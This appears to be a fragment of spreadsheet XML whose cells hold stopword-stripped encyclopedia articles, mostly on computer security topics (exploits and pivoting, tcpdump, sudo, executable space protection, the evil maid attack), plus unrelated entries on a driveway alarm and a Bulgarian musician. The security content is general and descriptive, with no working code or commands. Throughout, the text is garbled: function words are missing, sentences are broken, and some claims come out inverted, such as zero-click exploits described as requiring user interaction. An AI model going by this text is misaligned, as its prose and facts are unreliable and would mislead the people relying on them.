exploits keep private. exploits unknown everyone people found developed referred zero exploits. types exploitations commonly categorized named type vulnerability exploit (see vulnerabilities list), whether local/remote result running exploit (e.g. eop, dos, spoofing). scheme offers zero exploits exploit-as-a-service. zero-click zero-click attack exploit requires user interaction operate say, key-presses mouse clicks. forcedentry, discovered 2021, example zero-click attack.in 2022, group reportedly selling zero-click exploits governments breaking individual's phones. pivoting pivoting method used penetration testers uses compromised system attack systems network avoid restrictions firewall configurations, prohibit direct access machines. example, attacker compromises server corporate network, attacker compromised server attack systems network. these types attacks often called multi-layered attacks. pivoting also known island hopping. pivoting distinguished proxy pivoting pivoting: proxy pivoting practice channeling traffic compromised target using proxy payload machine launching attacks computer. this type pivoting restricted certain ports supported proxy.vpn pivoting enables attacker create encrypted layer tunnel compromised machine route network traffic target machine, example, vulnerability scan internal network compromised machine, effectively giving attacker full network access behind firewall.typically, proxy applications enabling pivoting executed target computer payload exploit. pivoting usually done infiltrating part network infrastructure example, vulnerable printer thermostat) using scanner find devices connected attack them. attacking vulnerable piece networking, attacker could infect network gain complete control. also computer security computer virus crimeware exploit hacking: exploitation (second edition) risk metasploit shellcode w3af notes external links media related computer security exploits wikimedia commons</t>
  </si>
  <si>
    <t>Tcpdump</t>
  </si>
  <si>
    <t>tcpdump data-network packet analyzer computer program runs command line interface. allows user display tcp/ip packets transmitted received network computer attached. distributed license, tcpdump free software. tcpdump works unix-like operating systems: linux, solaris, freebsd, dragonfly bsd, netbsd, openbsd, openwrt, macos, hp-ux 11i, aix. systems, tcpdump uses libpcap library capture packets. port tcpdump windows called windump; uses winpcap, windows version libpcap. history tcpdump originally written 1988 jacobson, sally floyd, vern paxson steven mccanne were, time, working lawrence berkeley laboratory network research group. late 1990s numerous versions tcpdump distributed part various operating systems, numerous patches well coordinated. michael richardson (mcr) bill fenner created www.tcpdump.org 1999. common uses tcpdump prints contents network packets. read packets network interface card previously created saved packet file. tcpdump write packets standard output file. also possible tcpdump specific purpose intercepting displaying communications another user computer. user necessary privileges system acting router gateway unencrypted traffic telnet http passes tcpdump view login ids, passwords, urls content websites viewed, unencrypted information. user optionally apply bpf-based filter limit number packets seen tcpdump; renders output usable networks high volume traffic. example available capture interfaces linux system: privileges required unix-like operating systems, user must superuser privileges tcpdump packet capturing mechanisms systems require elevated privileges. however, option used drop privileges specific unprivileged user capturing unix-like operating systems, packet capturing mechanism configured allow non-privileged users done, superuser privileges required. also tcptrace, tool analyzing logs produced tcpdump etherape, network mapping tool relies sniffing traffic ngrep, tool match regular expressions within network packet payloads netsniff-ng, free linux networking toolkit wireshark, based alternative tcpdump references external links official site tcpdump (and libpcap) official site windump tcpdump tutorial primer ngrep, tcpdump-like tool portable version tcpdump windows official site tcpdump android devices tutorial video tcpdump linux windump color highlighting</t>
  </si>
  <si>
    <t>Suhosin</t>
  </si>
  <si>
    <t>suhosin (korean 수호신, korean pronunciation: [suɦoɕin], meaning "guardian angel") open source patch also extension, written german company sektion eins. patch extension independent parts, used separately combination. "the goal behind suhosin safety protects servers insecure coding practices."suhosin also reduces "attackable surface" adds server function whitelists, resource limits, transparent session cookie encryption, binary content filter, logging various protections. this reduces risk deploying previously deemed unsafe programs protects known unknown attacks. features while original patch included several low-level memory-related hardenings, features present modules, upstreamed php. cookies encryption: mitigate xss-based cookies stealing, cookies encrypted, attacker could values, tied user-agent part address user, making stolen cookie unusable attacker. inclusion protection: uploaded remote files can't included, mitigating arbitrary file inclusion attacks. disabling common code execution vectors: eval keyword real function php, thus can't disabled disable_function directive, suhosin added possibility, also allowing disable infamous operator preg_replace function lead arbitrary code execution. protection infinite recursion: documented behavior yielding segmentation fault error upon infinite recursion. since memory-safety issue, suhosin make application gracefully exit maximum level recursion met. granular function white/black-list: disabled_function directive granular all, suhosin provides white black-list mechanism functions, virtual-host folder basis. black-list sensitive variable names: suhosin drop get, post, cookie variables global reserved variable names following names, like globals, _cookie, _env, _files, _get, _post,… file upload hardening: suhosin supports calling scripts upon file-upload, allowing things like automatic anti-virus scanning upon upload. also prevent files, binary files,… custom actions upon violation: blocking violating variables, send specific http response code, issue redirection even execute another script. extensive logging: multiple devices, logging offending filename line number, address attacker, even behind reverse proxies. distribution operating systems linux distributions, notably debian versions ("squeeze") gentoo linux, shipped default patch extension. suhosin removed debian version (wheezy) reappeared current development branch.it activated default server. 5.4, opensuse dropped suhosin patch, maintains port suhosin extension.freebsd 10.1 maintains suhosin extension ports collection. development history legacy suhosin first released 2006, targeted 5.2.0. last release hardening patch happened couple months release module. last news article official website 2007, activity occurred code repository 2012 february 2014. this distributions consider suhosin project dead, people community started contribute back circa 2014. there plan upstream features php. november 2015, suhosin7 created, provide similar hardening features php7 failed gain momentum among community. snuffleupagus project aims successor, php7 onwards. also references external links official website suhosin github</t>
  </si>
  <si>
    <t>Tcptrace</t>
  </si>
  <si>
    <t>tcptrace free open-source tool analyzing dump files. accepts input files produced packet-capture programs, including tcpdump, wireshark, snoop. tcptrace produce several different types output containing information connection seen, elapsed time, bytes segments sent received, retransmissions, round trip times, window advertisements, throughput. also produce graphs analysis. version minimal processing implemented addition capabilities. also dsniff etherape netsniff-ng ngrep tcpdump wireshark references</t>
  </si>
  <si>
    <t>Sudo</t>
  </si>
  <si>
    <t>sudo program unix-like computer operating systems enables users programs security privileges another user, default superuser. originally stood "superuser do", did, common usage; however, official sudo project page lists do". current linux manual pages define "substitute user", making correct meaning sudo "substitute user, do", sudo command users well.unlike similar command users must, default, supply password authentication, rather password target user. after authentication, configuration file (typically /etc/sudoers) permits user access, system invokes requested command. configuration file offers detailed access permissions, including enabling commands invoking terminal; requiring password user group; requiring re-entry password every time never requiring password particular command line. also configured permit passing arguments multiple commands. history robert coggeshall cliff spencer wrote original subsystem around 1980 department computer science suny/buffalo. robert coggeshall brought sudo university colorado boulder. between 1986 1993, code features substantially modified staff university colorado boulder computer science department college engineering applied science, including todd miller. current version publicly maintained openbsd developer todd miller since 1994, distributed isc-style license since 1999.in november 2009 thomas claburn, response concerns microsoft patented sudo, characterized suspicions overblown. claims narrowly framed particular gui, rather sudo concept.the logo reference xkcd strip. design unlike command users supply personal password sudo necessary) rather superuser account. this allows authorized users exercise altered privileges without compromising secrecy account's password. after authentication, configuration file permits user access, system invokes requested command. sudo retains user's invocation rights grace period (typically minutes) pseudo terminal, allowing user execute several successive commands requested user without provide password again. security auditing feature, sudo configured command run. when user attempts invoke sudo without listed configuration file, exception indication presented user indicating attempt recorded. root user alerted mail entry recorded system. configuration /etc/sudoers file contains list users user groups permission execute subset commands privileges root user another specified user. program configured require password. impact system distributions, sudo largely supplanted default distinct superuser login administrative tasks, notably linux distributions well apple's macos. this allows secure logging admin commands prevents exploits. rbac association selinux, sudo used transition roles role-based access control (rbac). tools similar programs visudo command-line utility allows editing sudo configuration file fail-safe manner. prevents multiple simultaneous edits locks performs sanity syntax checks. sudoedit program symlinks sudo binary. when sudo sudoedit alias, sudo behaves flag passed allows users edit files require additional privileges write to.the program runas provides similar functionality microsoft windows, cannot pass current directories, environment variables long command lines child. supports running child another user, support simple elevation. true sudo windows pass state information start child either elevated another user both) included hamilton shell.graphical user interfaces exist sudo notably gksudo deprecated debian longer included ubuntu. other user interfaces directly built sudo, provide similar temporary privilege elevation administrative purposes, pkexec unix-like operating systems, user account control microsoft windows authorization services.doas, available since openbsd (october 2015), written order replace sudo openbsd base system, latter still made available port. also chroot comparison privilege authorization features references external links official website</t>
  </si>
  <si>
    <t>Express Data Path</t>
  </si>
  <si>
    <t>(express data path) ebpf-based high-performance data path used send receive network packets high rates bypassing operating system networking stack. merged linux kernel since version 4.8. this implementation licensed gpl. large technology firms including amazon, google intel support development. microsoft released free open source implementation windows 2022. licensed license. data path idea behind early hook path kernel, user supplied ebpf program decide fate packet. hook placed network interface controller (nic) driver interrupt processing, memory allocation needed network stack itself, memory allocation expensive operation. design, drop million packets second core commodity hardware.the ebpf program must pass preverifier test loaded, avoid executing malicious code kernel space. preverifier checks program contains out-of-bounds accesses, loops global variables. program allowed edit packet data and, ebpf program returns, action code determines packet: xdp_pass: packet continue network stack xdp_drop: silently drop packet xdp_aborted: drop packet trace point exception xdp_tx: bounce packet back arrived xdp_redirect: redirect packet another user space socket af_xdp address familyxdp requires support driver but, drivers support fallback generic implementation, performs ebpf processing network stack, though slower performance.xdp infrastructure offload ebpf program network interface controller supports reducing load. time netronome cards supports intel mellanox working it.microsoft partnering companies adding support msquic protocol. af_xdp along xdp, address family entered linux kernel starting 4.18. af_xdp, formerly known af_packetv4 (which never included mainline kernel), socket optimized high performance packet processing allows zero-copy kernel applications. socket used receiving transmitting, supports high performance network applications purely user space. also application layer network layer data link layer references external links documentation read docs af_xdp documentation kernel.org xdp-for-windows github walkthrough fosdem 2017 daniel borkmann, cilium af_xdp fosdem 2018 magnus karlsson, intel ebpf.io introduction, tutorials community resources l4drop: ddos mitigations, cloudflare unimog: cloudflare's edge load balancer, cloudflare open-sourcing katran, scalable network load balancer, facebook cilium's l4lb: standalone load balancer, cilium kube-proxy replacement layer, cilium echo podcast load balancing</t>
  </si>
  <si>
    <t>Double fault</t>
  </si>
  <si>
    <t>architecture, double fault exception occurs processor encounters problem trying service pending interrupt exception. example situation double fault would occur interrupt triggered segment interrupt handler resides invalid. processor encounters problem calling double fault handler, triple fault generated processor shuts down. double faults happen kernel bugs, rarely caused user space programs modern protected mode operating system, unless program somehow gains kernel access (some viruses also low-level programs). other processors like powerpc sparc generally save state predefined reserved machine registers. double fault situation another exception happens processor still using contents registers process exception. sparc processors four levels registers, i.e. 4-window register system. also triple fault further reading collins, robert (2000). "triple faulting cpu". productivity enhancements programming tricks. archived original 2017-09-09. retrieved 2015-11-22.* osterman, larry (2005-02-08). "faster syscall trap redux". larry osterman's weblog. msdn blogs. archived original 2017-09-09. retrieved 2010-07-23.</t>
  </si>
  <si>
    <t>Subgraph (operating system)</t>
  </si>
  <si>
    <t>subgraph linux distribution designed resistant surveillance interference sophisticated adversaries internet. based debian. operating system mentioned edward snowden showing future potential.subgraph designed locked features reduce attack surface operating system, increase difficulty required carry certain classes attack. this accomplished system hardening proactive, ongoing focus security attack resistance. subgraph also places emphasis ensuring integrity installed software packages deterministic compilation. features some subgraph os's notable features include: linux kernel hardened grsecurity patchset. linux namespaces xpra application containment. mandatory file system encryption installation, using luks. resistance cold boot attacks. configurable firewall rules automatically ensure network connections installed applications made using anonymity network. default settings ensure application's communication transmitted independent circuit network. gnome shell integration virtualization client, runs apps inside secure linux container, targeting ease-of-use everyday users. security security subgraph (which uses sandbox containers) questioned comparison qubes (which uses virtualization), another security focused operating system. attacker trick subgraph user malicious unsandboxed script os's default nautilus file manager terminal. also possible malicious code containing .desktop files (which used launch applications). malware also bypass subgraph os's application firewall. also, design, subgraph isolate network stack like qubes also tails (operating system) qubes references external links official website subgraph (operating system) distrowatch</t>
  </si>
  <si>
    <t>SubOS</t>
  </si>
  <si>
    <t>computing, subos mean several related concepts: process-specific protection mechanism allowing potentially dangerous applications restricted environment. worked setting sub-user user owner file rather person running file.[1] substitute-operating system, simulated full operating system. these mainly developed gamemaker community. interface (graphical terminal based) provides additional functions command specific audience target.it also make processes easier details main operating system. also virtual machine sandbox (computer security)</t>
  </si>
  <si>
    <t>F6 disk</t>
  </si>
  <si>
    <t>disk colloquial name floppy disk containing microsoft windows device driver scsi raid system. disks used nt-based versions windows, including windows 2000, windows server 2003, windows starting windows vista, floppy disks obsolete; setup process supports loading third-party drivers drives cd-roms. usage disk named manner used. during installation process windows, setup program must load device drivers disk system windows installed. unless disk system established market finalization particular windows release installed, drivers included windows installation discs, must loaded means disk. disk loaded windows setup pressing immediately windows setup starts. message "press need install third party scsi raid driver..." briefly flashed screen every time windows setup starts. disk contains device drivers root directory. prior windows vista, disks always floppy disks because, point prompt shown, windows setup loaded drivers media type floppy disks. support drives cd-roms added windows vista. device drivers raid disk controllers often provided cd-roms manufacturers, must copied disk used windows setup. alternative approach slipstream required sata/scsi/sas/raid/eide drivers windows installation files directory (e.g. i386 variety) means software like nlite create image burned media. references microsoft support, kb313348</t>
  </si>
  <si>
    <t>FADE</t>
  </si>
  <si>
    <t>fade degrade) digital rights management software developed codemasters. operates detecting game pirated, initially allows player game normally. gradually degrades certain game features time, eventually rendering unplayable. works fade introduces deliberate errors sectors disc (which resemble errors scratched cd-rom/dvd-rom has). when disc copied, error-correction mechanism (both cd-roms dvd-roms employ error-correction techniques) notice errors automatically correct them. when game launched, game's executable looks errors, present original. available, knows fake. there notification error message tells player fake disk image detected, makes difficult software crackers determine crack succeeded defeating fade. fade introduce many issues game, rendering unplayable, giving impression game simply "buggy". example, arma fade begin gradually decreasing accuracy player's weapons, making difficult target. fade might reverse left/right controls vehicles, make randomly start stop moving. eventually turn player bird display message saying "good birds away game, blame". supported applications bohemia interactive used degrade releases operation flashpoint: cold crisis, fade used. software also present overlord.arma released september, 2013 uses fade piracy protection. serious uses fade introducing overpowered indestructible enemies zone. references</t>
  </si>
  <si>
    <t>Executable space protection</t>
  </si>
  <si>
    <t>computer security, executable-space protection marks memory regions non-executable, attempt execute machine code regions cause exception. makes hardware features (no-execute bit), cases software emulation features. however, technologies emulate supply usually impose measurable overhead using hardware-supplied imposes measurable overhead. burroughs 5000 offered hardware support executable-space protection introduction 1961; capability remained successors least 2006. implementation tagged architecture, word memory associated, hidden designating code data. thus user programs cannot write even read program word, data words cannot executed. operating system mark writable regions memory non-executable, able prevent stack heap memory areas executable. this helps prevent certain buffer overflow exploits succeeding, particularly inject execute code, sasser blaster worms. these attacks rely part memory, usually stack, writeable executable; not, attack fails. implementations many operating systems implement available executable space protection policy. here list systems alphabetical order, technologies ordered newest oldest. technologies, summary gives major features technology supports. summary structured below. hardware supported processors: (comma separated list architectures) emulation: (no) (architecture independent) (comma separated list architectures) other supported: (none) (comma separated list architectures) standard distribution: (no) (yes) (comma separated list distributions versions support technology) release date: (date first release)a technology supplying architecture independent emulation functional processors hardware supported. "other supported" line processors allow grey-area method, explicit exist hardware allows emulated way. android android later, architectures support non-executable pages default, including non-executable stack heap. freebsd initial support bit, x86-64 ia-32 processors support first appeared freebsd -current june 2004. freebsd releases since release. linux linux kernel supports x86-64 ia-32 processors support modern 64-bit processors made amd, intel, transmeta via. support feature 64-bit mode x86-64 cpus added 2004 andi kleen, later year, ingo molnar added support 32-bit mode 64-bit cpus. these features part linux kernel mainline since release kernel version 2.6.8 august 2004.the availability 32-bit kernels, 32-bit cpus 64-bit ia-32-compatible cpus, significant 32-bit kernel would normally expect amd64 ia-64 supplies; enabler patch assures kernels attempt present. some desktop linux distributions, fedora, ubuntu opensuse, enable highmem64 option default default kernels, required gain access 32-bit mode, mode required causes boot failures pre-pentium (including pentium mmx) celeron pentium processors without support. other processors support earlier, transmeta crusoe, earlier, geode vmware workstation versions older 4.0, parallels workstation versions older 4.0, microsoft virtual virtual server support guest. fedora core ubuntu 9.10 later provide kernel-pae package supports memory protection always available ubuntu systems hardware support 64-bit kernel 32-bit server kernel. 32-bit desktop kernel (linux-image-generic-pae) ubuntu 9.10 later, also provides mode needed hardware feature. systems lack hardware, 32-bit kernels provide approximation feature software emulation help block many exploits attacker might stack heap memory. non-execute functionality also present non-x86 processors supporting functionality many releases. exec shield kernel developer ingo molnar released linux kernel patch named exec shield approximate utilize functionality 32-bit cpus. exec shield patch released linux kernel mailing list 2003, rejected merging base kernel involved intrusive changes core code order handle complex parts emulation. exec shield's legacy support approximates emulation tracking upper code segment limit. this imposes cycles overhead context switches, intents purposes immeasurable. legacy cpus without bit, exec shield fails protect pages code segment limit; mprotect() call mark higher memory, stack, executable mark memory limit executable well. thus, situations, exec shield's schemes fails. this cost exec shield's overhead. exec shield checks header markings, dictate whether stack heap needs executable. these called pt_gnu_stack pt_gnu_heap respectively. exec shield allows controls binary executables libraries; executable loads library requiring given restriction relaxed, executable inherit marking restriction relaxed. hardware supported processors: linux supports emulation: approximation using code segment limit ia-32 (x86) compatible other supported: none standard distribution: fedora core enterprise linux release date: 2003 technology emulate functionality, hardware bit. works cpus bit, 32-bit x86. linux kernel still ship may, 2007); patch must merged manually. provides methods emulation, called segmexec pageexec. segmexec method imposes measurable overhead, typically less constant scalar incurred virtual memory mirroring used separation execution data accesses. segmexec also effect halving task's virtual address space, allowing task access less memory normally could. this problem task requires access half normal address space, rare. segmexec cause programs system memory (i.e. ram), restricts much access. 32-bit cpus, becomes rather supplies method similar exec shield's approximation pageexec speedup; however, higher memory marked executable, method loses protections. cases, falls back older, variable-overhead method used pageexec protect pages limit, become quite high-overhead operation certain memory access patterns. when pageexec method used supplying hardware bit, hardware used, thus significant overhead incurred. supplies mprotect() restrictions prevent programs marking memory ways produce memory useful potential exploit. this policy causes certain applications cease function, disabled affected programs. allows individual control following functions technology binary executable: pageexec segmexec mprotect() restrictions trampoline emulation randomized executable base randomized mmap() basepax ignores pt_gnu_stack pt_gnu_heap. past, configuration option honor settings option removed security reasons, deemed useful. results pt_gnu_stack normally attained disabling mprotect() restrictions, program normally mprotect() stack load. this always true; situations fails, simply disabling pageexec segmexec effectively remove executable space restrictions, giving task protections executable space non-pax system. hardware supported processors: alpha, amd64, ia-64, mips bit), pa-risc, powerpc, sparc emulation: ia-32 (x86) other supported: powerpc bit), sparc bit) standard distribution: alpine linux release date: october 2000 macos macos intel supports cpus supported apple (from 10.4.4 first intel release onwards). 10.4 supported stack protection. 10.5, 64-bit executables stack heap; protection. this includes x86-64 (core later) 64-bit powerpc macs. netbsd netbsd later (december 2004), architectures support non-executable stack heap. architectures per-page granularity consist alpha, amd64, hppa, i386 (with pae), powerpc (ibm4xx), sh5, sparc (sun4m, sun4d), sparc64. architectures support region granularity are: i386 (without pae), powerpc (such macppc). other architectures benefit non-executable stack heap; netbsd default software emulation offer features architectures. openbsd technology openbsd operating system, known w^x, marks writable pages default non-executable processors support that. 32-bit processors, code segment include part address space, provide level executable space protection. openbsd shipped 2003, first include w^x. hardware supported processors: alpha, amd64, hppa, sparc emulation: ia-32 (x86) other supported: none standard distribution: release date: 2003 solaris solaris supported globally disabling stack execution sparc processors since solaris (1997); solaris (2002), support disabling stack execution per-executable basis added. windows starting windows service pack (2004) windows server 2003 service pack (2005), features implemented first time architecture. executable space protection windows called "data execution prevention" (dep). under windows server 2003 protection used critical windows services exclusively default. processor supported feature hardware, features turned automatically windows xp/server 2003 default. feature supported processor, protection given. early implementations provided address space layout randomization (aslr), allowed potential return-to-libc attacks could feasibly used disable attack. documentation elaborates aslr necessary; proof-of-concept produced detailing method could circumvented absence aslr. possible develop successful attack address prepared data corrupted images mp3s known attacker. microsoft added aslr functionality windows vista windows server 2008. platform, implemented automatic kernel 32-bit windows native support 64-bit kernels. windows vista works marking certain parts memory intended hold data, enabled processor understands non-executable. windows, version vista, whether enabled disabled particular process viewed processes/details windows task manager. windows implements software (without bit) microsoft's "safe structured exception handling" (safeseh). properly compiled applications, safeseh checks that, exception raised program execution, exception's handler defined application originally compiled. effect protection attacker able exception handler stored data page unchecked program input.when supported, enabled default. windows allows programs control pages disallow execution well section headers file. api, runtime access exposed win32 calls virtualalloc[ex] virtualprotect[ex]. each page individually flagged executable non-executable. despite lack previous hardware support, executable non-executable page settings provided since beginning. pre-nx cpus, presence 'executable' attribute effect. documented function, and, result, programmers used properly. file format, section specify executability. execution flag existed since beginning format standard linkers always used flag correctly, even long bit. because this, windows able enforce programs. assuming programmer complied "best practices", applications work correctly actually enforced. only cases problems; microsoft's .net runtime problems updated. hardware supported processors: x86-64 (amd64 intel 64), ia-64, efficeon, pentium (later revisions), sempron (later revisions) emulation: other supported: none standard distribution: post windows release date: august 2004 xbox microsoft's xbox, although bit, newer versions code segment limit beginning kernel's .data section code point normal circumstances). starting version 51xx, change also implemented kernel xboxes. this broke techniques exploits used become tsr. however, exploits quickly released supporting kernel version fundamental vulnerability xbox kernel unaffected. limitations where code written executed runtime—a compiler prominent example—the compiler potentially used produce exploit code (e.g. using spray) flagged execution therefore would trapped.return-oriented programming allow attacker execute arbitrary code even executable space protection enforced. also buffer overflow buffer overflow protection heap overflow stack-smashing protection uncontrolled format string references</t>
  </si>
  <si>
    <t>Exec Shield</t>
  </si>
  <si>
    <t>exec shield project started hat, late 2002 reducing risk worm automated remote attacks linux systems. first result project security patch linux kernel emulates cpus lack native implementation hardware. while exec shield project many components, people refer first patch exec shield. first exec shield patch attempts flag data memory non-executable program memory non-writeable. this suppresses many security exploits, stemming buffer overflows techniques relying overwriting data inserting code structures. exec shield also supplies address space layout randomization mmap() heap base. patch additionally increases difficulty inserting executing shellcode, rendering exploits ineffective. application recompilation necessary fully utilize exec-shield, although applications (mono, wine, xemacs, mplayer) fully compatible. other features came exec shield project position independent executables (pie), address space randomization patch linux kernels, wide glibc internal security checks make heap format string exploits near impossible, fortify source feature, port merge stack-protector feature. implementation exec shield works cpus utilizing code segment limit. because exec shield works, lightweight; however, fully protect arbitrary virtual memory layouts. limit raised, example calling mprotect() make higher memory executable, protections lost limit. ingo molnar points e-mail conversation. most applications fairly sane this; stack (the important part) least winds mapped libraries, become executable except explicit calls application. august, 2004, nothing exec shield projects attempt enforce memory protections restricting mprotect() architecture; although memory initially executable, become executable later, kernel allow application mark memory pages writable executable time. however, cooperation security-enhanced linux project (selinux), standard policy fedora core distribution prohibit behavior executables, exceptions compatibility reasons. history exec shield developed various people hat; first patch released ingo molnar first released 2003. part fedora core enterprise linux since version other people involved include jakub jelínek, ulrich drepper, richard henderson arjan ven. also openwall stackguard references external links ingo molnar's exec shield patch page, includes documentation file announce-exec-shield newsforge feature article magazine feature/project article negative security issues execshield</t>
  </si>
  <si>
    <t>Sun Java System Directory Server</t>
  </si>
  <si>
    <t>java system directory server discontinued ldap directory server dsml server written originally developed microsystems. java system directory server component java enterprise system. earlier iterations java system directory server known directory server, iplanet directory server, and, that, netscape directory server. java system directory server became directory server enterprise edition currently known oracle directory server enterprise edition (odsee).the software available free charge perpetual usage individual, commercial, service provider, research instructional environments. still available download oracle website, official site products; however latest version (dsee rebranded odsee 11.1.1.5.0) found site. started developing opends java 2011, many issues developing java system directory server language. code base updated since 2011. supported internet standards directory server supports following rfcs: 2079, 2246, 2247, 2307, 2713, 2788, 2798, 2831, 2849, 2891, 3045, 3062, 3296, 3829, 3866, 4370, 4422, 4505, 4511, 4512, 4513, 4514, 4515, 4516, 4517, 4519, 4522, 4524, 4532. supported platforms directory server supported following platforms: solaris operating systems solaris trusted extensions opensolaris 2009.06 enterprise linux suse linux enterprise server hewlett-packard hp-ux 11.23 (pa-risc) microsoft windows server 2003 2008 standard edition enterprise edition also openldap directory server oracle identity management oracle internet directory list ldap software references external links java system directory server enterprise edition wayback machine (archived january 2010) java system directory server enterprise edition documentation oracle directory server enterprise edition http://docs.oracle.com/cd/e19261-01/</t>
  </si>
  <si>
    <t>Evil maid attack</t>
  </si>
  <si>
    <t>evil maid attack attack unattended device, attacker physical access alters undetectable later access device, data name refers scenario maid could subvert device left unattended hotel room concept also applies situations device intercepted transit, taken away temporarily airport enforcement personnel. overview origin 2009 blog post, security analyst joanna rutkowska coined term "evil maid attack"; hotel rooms common place devices left unattended. post detailed method compromising firmware unattended computer external flash drive therefore bypassing truecrypt disk encryption.d. defreez, computer security professional, first mentioned possibility evil maid attack android smartphones 2011. talked whispercore android distribution ability provide disk encryption androids. notability 2007, former u.s. commerce secretary carlos gutierrez allegedly targeted evil maid attack business trip china. left computer unattended trade talk beijing, suspected device compromised. although allegations confirmed denied, incident caused u.s. government wary physical attacks.in 2009, symantec mark bregman advised several u.s. agencies leave devices u.s. travelling china. instructed ones leaving dispose returned physical attempts retrieve data would ineffective. methods attack classic evil maid attack begins victim leaves device unattended. attacker proceed tamper system. victim's device password protection authentication, intruder turn computer immediately access victim's information. however, device password protected, full disk encryption, firmware device needs compromised, usually done external drive. compromised firmware often provides victim fake password prompt identical original. once password input, compromised firmware sends password attacker removes reboot. order successfully complete attack, attacker must return device unattended second time steal now-accessible data.another method attack attack attacker accesses victim's information hardware devices connect directly physical address space. attacker simply needs connect hardware device order access information. network evil maid evil maid attack also done replacing victim's device identical device. original device bootloader password, attacker needs acquire device identical bootloader password input screen. device lock screen, however, process becomes difficult attacker must acquire background picture lock screen mimicking device. either case, victim inputs password false device, device sends password attacker, possession original device. attacker access victim's data. vulnerable interfaces legacy bios legacy bios considered insecure evil maid attacks. architecture old, updates option roms unsigned, configuration unprotected. additionally, support secure boot. these vulnerabilities allow attacker boot external drive compromise firmware. compromised firmware configured send keystrokes attacker remotely. unified extensible firmware interface unified extensible firmware interface (uefi) provides many necessary features mitigating evil maid attacks. example, offers framework secure boot, authenticated variables boot-time, initialization security. despite available security measures, platform manufacturers obligated them. thus, security issues arise unused features allow attacker exploit device. full disk encryption systems many full disk encryption systems, truecrypt whole disk encryption, susceptible evil maid attacks inability authenticate user. attacker still modify disk contents despite device powered encrypted. attacker modify encryption system's loader codes steal passwords victim.the ability create communication channel bootloader operating system remotely steal password disk protected filevault also explored. macos system, attack additional implications “password forwarding” technology, user's account password also serves filevault password, enabling additional attack surface privilege escalation. thunderbolt 2019 vulnerability named "thunderclap" intel thunderbolt ports found many announced could allow rogue actor gain access system direct memory access (dma). this possible despite input/output memory management unit (iommu). this vulnerability largely patched vendors. this followed 2020 "thunderspy" believed unpatchable allows similar exploitation gain total access system bypassing security features. unattended device unattended device vulnerable network evil maid attack. attacker knows victim's device well enough, replace victim's device identical model password-stealing mechanism. thus, victim inputs password, attacker instantly notified able access stolen device's information. mitigation detection approach detect someone close handling unattended device. proximity alarms, motion detector alarms, wireless cameras, used alert victim attacker nearby device, thereby nullifying surprise factor evil maid attack. haven android created 2017 edward snowden monitoring, transmit results user's smartphone.in absence above, tamper-evident technology various kinds used detect whether device taken apart including low-cost solution putting glitter nail polish screw holes.after attack suspected, victim device checked malware installed, challenging. suggested approaches checking hashes selected disk sectors partitions. prevention device surveillance times, attacker cannot perform evil maid attack. left unattended, device also placed inside lockbox attacker physical access however, situations, device taken away temporarily airport enforcement personnel practical. basic security measures latest up-to-date firmware shutting device leaving unattended prevent attack exploiting vulnerabilities legacy architecture allowing external devices open ports, respectively.cpu-based disk encryption systems, tresor loop-amnesia, prevent data vulnerable attack ensuring leak system memory.tpm-based secure boot shown mitigate evil maid attacks authenticating device user. unlocking correct password given user measures unauthorized code executed device. these measurements done root trust systems, microsoft's bitlocker intel's technology. anti evil maid program builds upon tpm-based secure boot attempts authenticate device user. also cold boot attack references</t>
  </si>
  <si>
    <t>Tao ExDOS</t>
  </si>
  <si>
    <t>exdos emulator software application designed allow users ms-dos applications applications operating systems windows windows windows windows vista, windows windows 2000, windows terminal server. features exdos enables users applications work applications operating systems. using built-in virtual 8086 mode cpu, exdos enables 16-bit windows applications (that dos) effectively 32-bit windows desktop environments, including windows 10/8/7/vista/xp/2000 windows terminal server 2003/2008. support 64-bit systems available windows virtual mode, downloaded free microsoft windows professional, ultimate enterprise versions. additional modules allow users print printers connected ports, network printers, printers, pdf, microsoft word, html image files. references external links software development company website exdos product page magazine encyclopedia article archived 2016-03-04 wayback machine exdos cnet download.com exdos tucows downloads</t>
  </si>
  <si>
    <t>Driveway alarm</t>
  </si>
  <si>
    <t>driveway alarm device designed detect people vehicles entering property driveway. driveway alarm system often integrated component system automatically performs task alerts home owners unexpected intruder visitor. driveway alarms vital component security, automated lighting control, home control, energy efficiency, useful systems. overview driveway alarm always consists components, sensor receiver. sensor used detect people vehicles driveway receiver device alerts user owner detection. wireless driveway alarms consist three components, sensor, receiver transmitter sends wireless alert signal receiver.a driveway alarm connected burglar alarm used alert home owner security service detects intruder. such driveway also trigger security camera. driveway alarms found great application domestic commercial applications, especially retail drive thru applications. some popular residential commercial applications include motion-activated outdoor lighting systems, motion sensor street lamps motion sensor lanterns. sensors three types sensors commonly used driveway alarm systems: passive infrared senses heat motion. these sensors detect vehicles people prone false alarms animals. magnetic probe uses magnetic coil detect moving metal nearby. will alarm vehicle moves generally costly passive infrared units. rubber hose when pressure applied hose pushed hose triggering alarm. common commercial applications. wireless wired systems driveway alarms come wired wireless packages. infrared rubber hose systems generally sold wireless units magnetic probe systems equally available hard wired wireless systems. choosing wireless wired systems typically decided environment unit installed common driveway alarms sold wireless infrared units. also home automation home security motion detection magnetic field sensors remote camera references</t>
  </si>
  <si>
    <t>Esem</t>
  </si>
  <si>
    <t>esem (born february 1979) stage name georgi hristov marinov, bulgarian electronic music artist. esem used known tracker musician stereoman, member music group objectives sound exploration (noise). musical career marinov involved composing electronic music demoscene late 1990s, work brothomstates lackluster among others. after five-year netlabel membership noise ("new objectives sound exploration") marinov signed defocus records first vinyl single "ikae", debut album "enveloped", thus becoming first contemporary bulgarian electronic music artist released music record vinyl. after releasing second album "serial human" commercially merck records, esem moved london produced material "scateren" third album. "scateren" released free creative commons-licensed download kahvi, quickly became label's downloaded titles. 2007 parts "scateren" licensed subsequently released nintendo background music nintendo game "theta", downloadable ringtones (complementary game title). original album remains available creative commons. esem regular guest lithuanian label sutemos's "intelligent toys" series, featured alongside vladislav delay, digitonal, maps diagrams, ulrich schnauss, others. music featured austrian national radio (orf), john peel show radio 2006 marinov edited sofia-based soundscape radia network, later broadcast number european radio stations. july 2013 marinov authored one-hour-long programme london community radio station resonance "clearspot", featuring documentary recording 2013-14 protests oresharski cabinet bulgaria. methods esem employs trackers digital audio workstation software work. most published music produced using software synthesizers apple inc.'s logic sequencer. field recordings heard work unmodified used source material signal processing. since 2017, videos instagram feed feature modular synthesizer instruments prominently. much work outside music involves sound design software development. author adium soundset, called "minus bells". live performances marinov plays live occasionally. since 2000 played gigs europe including venues united kingdom, spain, sweden, russia, bulgaria, recently france, netherlands, using ableton live, teenage engineering op-1, various midi controllers. discography 2001 "ikae" (12") defocus. lossless remaster released 2019. 